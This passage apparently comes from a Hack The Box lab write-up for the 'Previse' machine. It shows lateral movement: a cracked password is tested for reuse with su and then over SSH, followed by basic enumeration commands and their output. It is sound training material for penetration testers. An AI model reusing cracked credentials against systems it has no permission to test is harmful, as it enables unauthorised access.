m4lwhere
I was able to crack the password hash for the m4lwhere user.
While the credential is used for the web application, I will test it out for password reuse as the user is also a system user
www-data@previse:/var/www/html$ su m4lwhere
password: ilovecody112235!
m4lwhere@previse:/var/www/html$ id
uid=1000(m4lwhere) gid=1000(m4lwhere) groups=1000(m4lwhere)Password reuse confirmed.
SSH
┌──(kali㉿kali)-[~/…/htb/labs/previse/siteBackup]
└─$ ssh m4lwhere@$IP
m4lwhere@10.10.11.104's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Apr 12 12:51:19 UTC 2023
System load: 0.0 Processes: 179
Usage of /: 51.9% of 4.85GB Users logged in: 0
Memory usage: 39% IP address for eth0: 10.10.11.104
Swap usage: 0%
0 updates can be applied immediately.
Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ whoami
m4lwhere
m4lwhere@previse:~$ hostname
previse
m4lwhere@previse:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.104 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:3246 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:3246 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:32:46 txqueuelen 1000 (Ethernet)
RX packets 1948084 bytes 242671507 (242.6 MB)
RX errors 0 dropped 31 overruns 0 frame 0
TX packets 1616904 bytes 805664953 (805.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 15916 bytes 1341057 (1.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 15916 bytes 1341057 (1.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Lateral Movement made to the m4lwhere user via SSH